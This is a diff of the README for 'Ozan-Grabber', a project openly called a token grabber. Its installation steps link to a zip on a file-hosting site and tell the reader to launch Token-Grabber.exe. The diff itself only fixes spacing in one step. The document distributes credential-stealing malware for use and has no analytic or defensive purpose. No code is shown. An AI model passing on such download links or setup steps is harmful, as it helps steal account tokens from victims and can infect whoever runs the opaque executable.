tdmozan/Ozan-Grabber/README.md

 # Installation
 1. First download token grabber from here https://dosya.co/6gss1wzkpszw/Token-Grabber-Main.zip.html
 2. Download any python version
-3.Launch Token-Grabber.exe and select the python version and wait
+3. Launch Token-Grabber.exe and select the python version and wait
 4. And There You Go!
 # MADE BY TDMOZAN